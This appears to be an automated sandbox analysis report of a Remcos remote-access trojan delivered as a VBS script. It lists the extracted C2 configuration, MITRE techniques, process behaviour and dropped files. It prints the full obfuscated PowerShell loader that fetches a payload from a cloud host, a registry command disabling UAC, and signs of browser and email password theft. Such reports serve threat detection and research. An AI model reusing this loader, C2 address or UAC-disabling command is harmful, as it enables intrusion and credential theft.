remcos | e1f4be2ad6856e77fb023eb77c71a57ee1ac3cadbf34c129e2df1f6a6ad0cc98

Analysis

max time kernel
147s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
03-07-2024 07:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Scan_20240702_1449041448298.vbs
Size

24KB
MD5

241fc9096c5621d50bc29ebbb4cb59d5
SHA1

89d48c32fb8cb242ca7d8d851c2b621db084af70
SHA256

0dcbd37265e4f424a54193e437d0966ba6b29439ec6511dc64379bb882d53b5a
SHA512

347d5fe11a3e3841c84e672c27521f5b849d0b7c6d52d873c507810b2da2ae3de37fc2263067a23f497e16eac61976f0dc52bbace51f28280c5cb9bbd62a1f66
SSDEEP

384:3EqYZLXhghQVoWc8OCgifcmAqS7gS9F2G5mzHICh:3EqIXhghQCWclC9tPxS3XuHIg

Score

10^/10

remcos remotehost collection evasion rat trojan

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

54lpnbz0xdwx.duckdns.org:3756

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-3EXTO9
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
UAC bypass 3 TTPs 1 IoCs
evasion trojan

Bypass User Account Control
T1548.002

Disable or Modify Tools
T1562.001

Modify Registry
T1112

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients

Processes:

resource yara_rule

behavioral2/memory/2368-73-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers

Processes:

resource yara_rule

behavioral2/memory/2284-72-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

resource	yara_rule
behavioral2/memory/2368-73-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

resource	yara_rule
behavioral2/memory/2284-72-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Nirsoft 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2368-73-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral2/memory/2284-72-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral2/memory/2356-71-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft

Blocklisted process makes network request 3 IoCs

Processes:

WScript.exepowershell.exe

flow pid process

6 2064 WScript.exe
47 4736 powershell.exe
49 4736 powershell.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

WScript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation WScript.exe
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
collection

Email Collection
T1114

Processes:

wab.exe

description ioc process

Key opened \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts wab.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

47 drive.google.com
53 drive.google.com
46 drive.google.com
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

wab.exe

pid process

380 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

4960 powershell.exe
380 wab.exe

flow	pid	process
6	2064	WScript.exe
47	4736	powershell.exe
49	4736	powershell.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation	WScript.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	wab.exe

flow	ioc
47	drive.google.com
53	drive.google.com
46	drive.google.com

pid	process
380	wab.exe

pid	process
4960	powershell.exe
380	wab.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

powershell.exewab.exe

description	pid	process	target process
PID 4960 set thread context of 380	4960	powershell.exe	wab.exe
PID 380 set thread context of 2284	380	wab.exe	wab.exe
PID 380 set thread context of 2368	380	wab.exe	wab.exe
PID 380 set thread context of 2356	380	wab.exe	wab.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

2476 reg.exe
Suspicious behavior: EnumeratesProcesses 11 IoCs

Processes:

powershell.exepowershell.exewab.exewab.exe

pid process

4736 powershell.exe
4736 powershell.exe
4960 powershell.exe
4960 powershell.exe
4960 powershell.exe
2356 wab.exe
2356 wab.exe
2284 wab.exe
2284 wab.exe
2284 wab.exe
2284 wab.exe
Suspicious behavior: MapViewOfSection 4 IoCs

Processes:

powershell.exewab.exe

pid process

4960 powershell.exe
380 wab.exe
380 wab.exe
380 wab.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exewab.exe

description pid process

Token: SeDebugPrivilege 4736 powershell.exe
Token: SeDebugPrivilege 4960 powershell.exe
Token: SeDebugPrivilege 2356 wab.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

wab.exe

pid process

380 wab.exe

pid	process
2476	reg.exe

pid	process
4736	powershell.exe
4736	powershell.exe
4960	powershell.exe
4960	powershell.exe
4960	powershell.exe
2356	wab.exe
2356	wab.exe
2284	wab.exe
2284	wab.exe
2284	wab.exe
2284	wab.exe

pid	process
4960	powershell.exe
380	wab.exe
380	wab.exe
380	wab.exe

description	pid	process
Token: SeDebugPrivilege	4736	powershell.exe
Token: SeDebugPrivilege	4960	powershell.exe
Token: SeDebugPrivilege	2356	wab.exe

pid	process
380	wab.exe

Suspicious use of WriteProcessMemory 33 IoCs

Processes:

WScript.exepowershell.exepowershell.exewab.execmd.exe

description	pid	process	target process
PID 2064 wrote to memory of 4736	2064	WScript.exe	powershell.exe
PID 2064 wrote to memory of 4736	2064	WScript.exe	powershell.exe
PID 4736 wrote to memory of 4332	4736	powershell.exe	cmd.exe
PID 4736 wrote to memory of 4332	4736	powershell.exe	cmd.exe
PID 4736 wrote to memory of 4960	4736	powershell.exe	powershell.exe
PID 4736 wrote to memory of 4960	4736	powershell.exe	powershell.exe
PID 4736 wrote to memory of 4960	4736	powershell.exe	powershell.exe
PID 4960 wrote to memory of 2224	4960	powershell.exe	cmd.exe
PID 4960 wrote to memory of 2224	4960	powershell.exe	cmd.exe
PID 4960 wrote to memory of 2224	4960	powershell.exe	cmd.exe
PID 4960 wrote to memory of 380	4960	powershell.exe	wab.exe
PID 4960 wrote to memory of 380	4960	powershell.exe	wab.exe
PID 4960 wrote to memory of 380	4960	powershell.exe	wab.exe
PID 4960 wrote to memory of 380	4960	powershell.exe	wab.exe
PID 4960 wrote to memory of 380	4960	powershell.exe	wab.exe
PID 380 wrote to memory of 880	380	wab.exe	cmd.exe
PID 380 wrote to memory of 880	380	wab.exe	cmd.exe
PID 380 wrote to memory of 880	380	wab.exe	cmd.exe
PID 880 wrote to memory of 2476	880	cmd.exe	reg.exe
PID 880 wrote to memory of 2476	880	cmd.exe	reg.exe
PID 880 wrote to memory of 2476	880	cmd.exe	reg.exe
PID 380 wrote to memory of 2284	380	wab.exe	wab.exe
PID 380 wrote to memory of 2284	380	wab.exe	wab.exe
PID 380 wrote to memory of 2284	380	wab.exe	wab.exe
PID 380 wrote to memory of 2284	380	wab.exe	wab.exe
PID 380 wrote to memory of 2368	380	wab.exe	wab.exe
PID 380 wrote to memory of 2368	380	wab.exe	wab.exe
PID 380 wrote to memory of 2368	380	wab.exe	wab.exe
PID 380 wrote to memory of 2368	380	wab.exe	wab.exe
PID 380 wrote to memory of 2356	380	wab.exe	wab.exe
PID 380 wrote to memory of 2356	380	wab.exe	wab.exe
PID 380 wrote to memory of 2356	380	wab.exe	wab.exe
PID 380 wrote to memory of 2356	380	wab.exe	wab.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Scan_20240702_1449041448298.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2064

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Samvrs Detailvirksomheders Vaporizations Fingeraftrykkets Toking Peglegged Diakonissernes Karambolages Beklder Medkmpe Bredygtigeres Iagttagerpositionen Nonmotile Kathodic malposition revalorizing Unspelt Udlbsdagene Borroughs Klassekvotienter Tectosphere Naijas Tankningernes Perioikoi Samvrs Detailvirksomheders Vaporizations Fingeraftrykkets Toking Peglegged Diakonissernes Karambolages Beklder Medkmpe Bredygtigeres Iagttagerpositionen Nonmotile Kathodic malposition revalorizing Unspelt Udlbsdagene Borroughs Klassekvotienter Tectosphere Naijas Tankningernes Perioikoi';If (${host}.CurrentCulture) {$Bladdden++;}Function Interrail($Aspidocephali){$Lucindas=$Aspidocephali.Length-$Bladdden;$spndskruers='SUBsTRI';$spndskruers+='ng';For( $Vougeot=2;$Vougeot -lt $Lucindas;$Vougeot+=3){$Samvrs+=$Aspidocephali.$spndskruers.Invoke( $Vougeot, $Bladdden);}$Samvrs;}function Subprofitableness($Sprgsmaalstegnets){ . ($Minisystems) ($Sprgsmaalstegnets);}$Underwrought=Interrail 'S.MDioLozUniS lS lHaa O/,f5In.Ko0Mo Si(CrW riFon,adS,o lw,isBi AfN iTUn Nu1,m0Fr.Be0Un;Pe SW.viTin S6Ha4S.;e. Nx I6Nd4R,;Dr ,lrnov,a: R1Bo2M.1Sa. .0B,)Ov DiG e cGakS.o J/Ta2 ,0,p1Af0Ud0Kl1Sk0 L1.n DeFS i Sr .ePofTeoS.xDr/ n1Os2Tu1 u.Ca0at ';$Snoet=Interrail ' dU Vs Ke.ar L- AS gNuehanU.t.p ';$Toking=Interrail 'NohBitTetWepCos G:ud/Ka/KndStrF,iIsv .eS .PagBoo So.rgSilHoeSe. Hc CoDemKa/ Su icPr?CoeHux,lpM.oPrr ,tGr= SdU.oOpw.in blKooCoaR dOp&SeiU.d.a=Im1Fi2TeUAnG.ePMaL TXMozraLOl4SuW o7Ok_SwD,to ,Z.lORecApm.aDKajBrgV.QAwu,i7K AIr_ NrA 7.rAB oFuPb.oDi ';$kummels=Interrail 'te> e ';$Minisystems=Interrail 'viiC.e BxG. ';$Angiohemophilia='Karambolages';$underwage = Interrail 'IneDicSoh lo,k Fo%F,aPrpT.pCedU.aAftS,aUn%No\K,KOpaunt.ahT iK nGrkFoaA sLa.MeD.na .aMa S&Ox&Re geeUdcT.h ,oSp Unt.i ';Subprofitableness (Interrail ' a$P,g .lLioAsbBaa FlDo: DBRouLyr TeDiaPruG xAn=De(stcSemT dNo Tr/ .cOm ,$CluBrnGedUde nr Bw,baBogLueN.)R, ');Subprofitableness (Interrail ' ,$ EgOpl.koBib ga.jlS,:,nFBoiStn ugvoeCorPoa DfDetTorIdyRek AkEneDytTesMa=Ca$ pT,uo,nkDei.rn SgTi. .sGlpMilF,iAktSo( P$ ka.uWhminm,neOulGasFo)Sh ');Subprofitableness (Interrail 'S,[AfNBre tIn. KSReeTir ,vPri.ncGnebrP.eo ,iFonDotV.M aaManTra agA.e,irso]B : a:GdSDee Ocv u,br i TttiyFuPUnrSaoLutU.o lcMaoPrlH. i=Ti Em[K N,oeSktKa. S.yeArcI.uSjrBaiVat MyI PLirLyoHjt noHicI,oBol.nTPuySkp seUd]M : .:IgTPel,esR,1 a2 R ');$Toking=$Fingeraftrykkets[0];$Trotty= (Interrail '.e$.egD,lB,o .bTyan lVa:S M .a Og WnPaeFlt Me rPa=A NB.e.jwAb-C OMobWhjM,e ,c.nt . StSFuy os ftF eAnmS .hiN.eeJat.i..rWMyeNabAfCB lTri,oe anSpt');$Trotty+=$Bureaux[1];Subprofitableness ($Trotty);Subprofitableness (Interrail 'Ni$,aM RaBag EnKue.itSeeS.r a.PlH TeBoaRudpoeStrU,s.a[.a$HaS,en Do ,e .t T]An=Ve$ aUDvn.idUneS,rphwDorF,oKou.lg Dhbrtir ');$Brugsgenstande=Interrail 'Qu$.uM PaBrghjnTaeMatHaeG.rAt.TiD NoGrw,anRolTaoUnaDadB.F iAklUpeRa( $DyT .oEqk ui Pn Ig I,,n$DiNExap.irej WaD sVe) O ';$Naijas=$Bureaux[0];Subprofitableness (Interrail ' ,$ PgBnl Po b FaCalPa:S,TRaaR.c.dhM i asOxtH oVisKocR.oKupMuiNecCia,mlStl,xyAu=O.(D,TUde sKat .-,rP.aaGutUnh,e L$D N XaUdi WjEta,asC,) , ');while (!$Tachistoscopically) {Subprofitableness (Interrail 'Fl$G.gStlL,oU,b .a .lho:WaUTunGeaNad.ovMeiUdsT a DbPoiDilSuiT.tIny ,=.n$ nt.er ouSeeCr ') ;Subprofitableness $Brugsgenstande;Subprofitableness (Interrail 'FdSDit .a Rr Atfo-KaS ElP eOpeDepHo Ru4.y ');Subprofitableness (Interrail 'U,$UngHolIno,ab KaPrlR.:PiTS,a.kcTuhTriUpsAdts.o ,sSkcTooB.p ii tcSaaUnlR lVay.n= S(S.T.ieWaseltQu-AlPStaKntM,hRe Di$SmNR,aOpiAfj paT,sFi) E ') ;Subprofitableness (Interrail 'Qu$,ag .lFroTmb,ra.wl r: .VFiaDip boBorHoiChz a StU,iHioU,nSisCo=,d$TogFol FoH,bRuaLalBr:FrDFle AtT aSti ,l ivToiKar,ukSpsCho Bm NhRae GdG.eVar ,sCu+Pr+Pr%Wa$ KFMui nU g ,eN rTaa.ef Pt Pr.ryOekBikDyeDetNosQ.. Sc SoU uMonNot A ') ;$Toking=$Fingeraftrykkets[$Vaporizations];}$cameroun=315806;$Harlekiner=27801;Subprofitableness (Interrail 'Im$,eg olSaoBabMeaVilBu: GB BeimkGllIddTee,yr S Uf= . yG SeTrtLy-SpCDeo.enAwt enonM,tUd ,$N Ncaa.liBajSaaDes o ');Subprofitableness (Interrail 'N.$s,g Fl AoPabDiaP.lTi: TQ Ou SaAuy,a Mi=Sa r[ApSGryAnsP.tMeesemS..T.C RoTonStvAdeGrrPstSe] o:Ti: ,FGorFooGim ,B TaD.sPreLi6za4hiSS tFer fiS.nIngRe(Su$gyBS.ePek ,l.edBoeurrRu) O ');Subprofitableness (Interrail 'Gl$Hjg ClHao KbDaaI.lTi:,cIBoa EgDotEkt GaM gCleTarTypH,oOvs SiUntF,iDuoHan ge .n F Fo=Sy .a[VdSBeyI sHet ,e mOs.S.T NeM,x Pt .Y E ,nSpc Ko .drei Sn .g,a]d.:Po:HuAArSS.CReI RI ,.E GPie ut MSInt rI iT nkjg,e(,u$PoQ duDuaE yto) e ');Subprofitableness (Interrail ' s$.dg,olDio DbF a Fl N:ScEPokOvsk,t le.arAnnHea.otBusddkZioExlUte nK,= ,$ScI,la.egUntbatUnaS gUneMer pSho .s iRet.mi toBrn Se nSa.NosObu bKysaltU.rPli nGlgPr(Sk$ c.oaOnmAdeStr.ro,nuBonH ,Ut$B HIna rUnlNaeBekchi EnF,eHurO.)N ');Subprofitableness $Eksternatskolen;"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4736

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Kathinkas.Daa && echo t"
3⤵
PID:4332

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Samvrs Detailvirksomheders Vaporizations Fingeraftrykkets Toking Peglegged Diakonissernes Karambolages Beklder Medkmpe Bredygtigeres Iagttagerpositionen Nonmotile Kathodic malposition revalorizing Unspelt Udlbsdagene Borroughs Klassekvotienter Tectosphere Naijas Tankningernes Perioikoi Samvrs Detailvirksomheders Vaporizations Fingeraftrykkets Toking Peglegged Diakonissernes Karambolages Beklder Medkmpe Bredygtigeres Iagttagerpositionen Nonmotile Kathodic malposition revalorizing Unspelt Udlbsdagene Borroughs Klassekvotienter Tectosphere Naijas Tankningernes Perioikoi';If (${host}.CurrentCulture) {$Bladdden++;}Function Interrail($Aspidocephali){$Lucindas=$Aspidocephali.Length-$Bladdden;$spndskruers='SUBsTRI';$spndskruers+='ng';For( $Vougeot=2;$Vougeot -lt $Lucindas;$Vougeot+=3){$Samvrs+=$Aspidocephali.$spndskruers.Invoke( $Vougeot, $Bladdden);}$Samvrs;}function Subprofitableness($Sprgsmaalstegnets){ . ($Minisystems) ($Sprgsmaalstegnets);}$Underwrought=Interrail 'S.MDioLozUniS lS lHaa O/,f5In.Ko0Mo Si(CrW riFon,adS,o lw,isBi AfN iTUn Nu1,m0Fr.Be0Un;Pe SW.viTin S6Ha4S.;e. Nx I6Nd4R,;Dr ,lrnov,a: R1Bo2M.1Sa. .0B,)Ov DiG e cGakS.o J/Ta2 ,0,p1Af0Ud0Kl1Sk0 L1.n DeFS i Sr .ePofTeoS.xDr/ n1Os2Tu1 u.Ca0at ';$Snoet=Interrail ' dU Vs Ke.ar L- AS gNuehanU.t.p ';$Toking=Interrail 'NohBitTetWepCos G:ud/Ka/KndStrF,iIsv .eS .PagBoo So.rgSilHoeSe. Hc CoDemKa/ Su icPr?CoeHux,lpM.oPrr ,tGr= SdU.oOpw.in blKooCoaR dOp&SeiU.d.a=Im1Fi2TeUAnG.ePMaL TXMozraLOl4SuW o7Ok_SwD,to ,Z.lORecApm.aDKajBrgV.QAwu,i7K AIr_ NrA 7.rAB oFuPb.oDi ';$kummels=Interrail 'te> e ';$Minisystems=Interrail 'viiC.e BxG. ';$Angiohemophilia='Karambolages';$underwage = Interrail 'IneDicSoh lo,k Fo%F,aPrpT.pCedU.aAftS,aUn%No\K,KOpaunt.ahT iK nGrkFoaA sLa.MeD.na .aMa S&Ox&Re geeUdcT.h ,oSp Unt.i ';Subprofitableness (Interrail ' a$P,g .lLioAsbBaa FlDo: DBRouLyr TeDiaPruG xAn=De(stcSemT dNo Tr/ .cOm ,$CluBrnGedUde nr Bw,baBogLueN.)R, ');Subprofitableness (Interrail ' ,$ EgOpl.koBib ga.jlS,:,nFBoiStn ugvoeCorPoa DfDetTorIdyRek AkEneDytTesMa=Ca$ pT,uo,nkDei.rn SgTi. .sGlpMilF,iAktSo( P$ ka.uWhminm,neOulGasFo)Sh ');Subprofitableness (Interrail 'S,[AfNBre tIn. KSReeTir ,vPri.ncGnebrP.eo ,iFonDotV.M aaManTra agA.e,irso]B : a:GdSDee Ocv u,br i TttiyFuPUnrSaoLutU.o lcMaoPrlH. i=Ti Em[K N,oeSktKa. S.yeArcI.uSjrBaiVat MyI PLirLyoHjt noHicI,oBol.nTPuySkp seUd]M : .:IgTPel,esR,1 a2 R ');$Toking=$Fingeraftrykkets[0];$Trotty= (Interrail '.e$.egD,lB,o .bTyan lVa:S M .a Og WnPaeFlt Me rPa=A NB.e.jwAb-C OMobWhjM,e ,c.nt . StSFuy os ftF eAnmS .hiN.eeJat.i..rWMyeNabAfCB lTri,oe anSpt');$Trotty+=$Bureaux[1];Subprofitableness ($Trotty);Subprofitableness (Interrail 'Ni$,aM RaBag EnKue.itSeeS.r a.PlH TeBoaRudpoeStrU,s.a[.a$HaS,en Do ,e .t T]An=Ve$ aUDvn.idUneS,rphwDorF,oKou.lg Dhbrtir ');$Brugsgenstande=Interrail 'Qu$.uM PaBrghjnTaeMatHaeG.rAt.TiD NoGrw,anRolTaoUnaDadB.F iAklUpeRa( $DyT .oEqk ui Pn Ig I,,n$DiNExap.irej WaD sVe) O ';$Naijas=$Bureaux[0];Subprofitableness (Interrail ' ,$ PgBnl Po b FaCalPa:S,TRaaR.c.dhM i asOxtH oVisKocR.oKupMuiNecCia,mlStl,xyAu=O.(D,TUde sKat .-,rP.aaGutUnh,e L$D N XaUdi WjEta,asC,) , ');while (!$Tachistoscopically) {Subprofitableness (Interrail 'Fl$G.gStlL,oU,b .a .lho:WaUTunGeaNad.ovMeiUdsT a DbPoiDilSuiT.tIny ,=.n$ nt.er ouSeeCr ') ;Subprofitableness $Brugsgenstande;Subprofitableness (Interrail 'FdSDit .a Rr Atfo-KaS ElP eOpeDepHo Ru4.y ');Subprofitableness (Interrail 'U,$UngHolIno,ab KaPrlR.:PiTS,a.kcTuhTriUpsAdts.o ,sSkcTooB.p ii tcSaaUnlR lVay.n= S(S.T.ieWaseltQu-AlPStaKntM,hRe Di$SmNR,aOpiAfj paT,sFi) E ') ;Subprofitableness (Interrail 'Qu$,ag .lFroTmb,ra.wl r: .VFiaDip boBorHoiChz a StU,iHioU,nSisCo=,d$TogFol FoH,bRuaLalBr:FrDFle AtT aSti ,l ivToiKar,ukSpsCho Bm NhRae GdG.eVar ,sCu+Pr+Pr%Wa$ KFMui nU g ,eN rTaa.ef Pt Pr.ryOekBikDyeDetNosQ.. Sc SoU uMonNot A ') ;$Toking=$Fingeraftrykkets[$Vaporizations];}$cameroun=315806;$Harlekiner=27801;Subprofitableness (Interrail 'Im$,eg olSaoBabMeaVilBu: GB BeimkGllIddTee,yr S Uf= . yG SeTrtLy-SpCDeo.enAwt enonM,tUd ,$N Ncaa.liBajSaaDes o ');Subprofitableness (Interrail 'N.$s,g Fl AoPabDiaP.lTi: TQ Ou SaAuy,a Mi=Sa r[ApSGryAnsP.tMeesemS..T.C RoTonStvAdeGrrPstSe] o:Ti: ,FGorFooGim ,B TaD.sPreLi6za4hiSS tFer fiS.nIngRe(Su$gyBS.ePek ,l.edBoeurrRu) O ');Subprofitableness (Interrail 'Gl$Hjg ClHao KbDaaI.lTi:,cIBoa EgDotEkt GaM gCleTarTypH,oOvs SiUntF,iDuoHan ge .n F Fo=Sy .a[VdSBeyI sHet ,e mOs.S.T NeM,x Pt .Y E ,nSpc Ko .drei Sn .g,a]d.:Po:HuAArSS.CReI RI ,.E GPie ut MSInt rI iT nkjg,e(,u$PoQ duDuaE yto) e ');Subprofitableness (Interrail ' s$.dg,olDio DbF a Fl N:ScEPokOvsk,t le.arAnnHea.otBusddkZioExlUte nK,= ,$ScI,la.egUntbatUnaS gUneMer pSho .s iRet.mi toBrn Se nSa.NosObu bKysaltU.rPli nGlgPr(Sk$ c.oaOnmAdeStr.ro,nuBonH ,Ut$B HIna rUnlNaeBekchi EnF,eHurO.)N ');Subprofitableness $Eksternatskolen;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4960

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Kathinkas.Daa && echo t"
4⤵
PID:2224

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:380

C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
5⤵
- Suspicious use of WriteProcessMemory
PID:880

C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
6⤵
- UAC bypass
- Modifies registry key
PID:2476

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\rebjsvmzovwsshujeojufozsw"
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:2284

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\bhpttoxbcdowcoqnnzvvhbtbftlw"
5⤵
- Accesses Microsoft Outlook accounts
PID:2368

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\lbumtgpvplgjeuezejqpsgosgiufrotw"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2356

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4012,i,2607710392823067546,4648797561512801463,262144 --variations-seed-version --mojo-platform-channel-handle=2860 /prefetch:8
1⤵
PID:1660

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat
Filesize
144B

MD5
d44f2b9ade468fd3b4e4d192690bbf0d

SHA1
924f9efac1d961df369fb7aeef389c50abdcfbbc

SHA256
202c7c90fcca5511162d14c4896812e46a1cfda85e0ea027a7bff1133c451261

SHA512
bb2173ca5836922f4ffbfc4b43482060ab886209b3814123df54011276d8323cf8a04373c7fb02013980f9de77863fdfe84ba2fdf7d7107319cf7496708af08b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ri4dxjic.3jf.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\rebjsvmzovwsshujeojufozsw
Filesize
4KB

MD5
91227a2f05c7f74f6ebd1535a3f05b7b

SHA1
1ce317a272d67e3ac284948e49e6bc0acaee2e6d

SHA256
2967c8bcad47ab6cb88bf5b60a3a75b49f471a943d33c9b69aa7bfe1b763cfd2

SHA512
9ff9f6d2fb2880812fce42b91388e8b825483bb2df0976b9c630c397fed68f3625f4ba32d65933de0018b6e18554315152a1df00c98313d19612403076079a40

Download Submit
C:\Users\Admin\AppData\Roaming\Kathinkas.Daa
Filesize
447KB

MD5
aa7ff414a9d34f1f3b590ddb748d89d8

SHA1
87fd080ad2741b32d598ff47cd74838e3563c9da

SHA256
54328c23c62f1e5e1378d0e37da88318140a16b413c14de68b68331ecc5a4414

SHA512
55a31828bfec2397f98501571af68076aaebd8cb9b951a31f3dc72d15ba953f1564e0162531d75e3f1947f3876d50d0957290d9b25f6d18a81adc7080047a2ed

Download Submit
memory/380-57-0x0000000000D40000-0x0000000001F94000-memory.dmp

Filesize
18.3MB

Download
memory/380-97-0x0000000000D40000-0x0000000001F94000-memory.dmp

Filesize
18.3MB

Download
memory/380-94-0x0000000000D40000-0x0000000001F94000-memory.dmp

Filesize
18.3MB

Download
memory/380-91-0x0000000000D40000-0x0000000001F94000-memory.dmp

Filesize
18.3MB

Download
memory/380-89-0x000000001F7E0000-0x000000001F7F9000-memory.dmp

Filesize
100KB

Download
memory/380-88-0x000000001F7E0000-0x000000001F7F9000-memory.dmp

Filesize
100KB

Download
memory/380-85-0x000000001F7E0000-0x000000001F7F9000-memory.dmp

Filesize
100KB

Download
memory/2284-67-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2284-72-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2284-65-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2356-71-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2356-70-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2356-69-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2368-73-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2368-68-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2368-66-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/4736-43-0x00007FFEFF5E0000-0x00007FFF000A1000-memory.dmp

Filesize
10.8MB

Download
memory/4736-56-0x00007FFEFF5E3000-0x00007FFEFF5E5000-memory.dmp

Filesize
8KB

Download
memory/4736-4-0x00007FFEFF5E3000-0x00007FFEFF5E5000-memory.dmp

Filesize
8KB

Download
memory/4736-63-0x00007FFEFF5E0000-0x00007FFF000A1000-memory.dmp

Filesize
10.8MB

Download
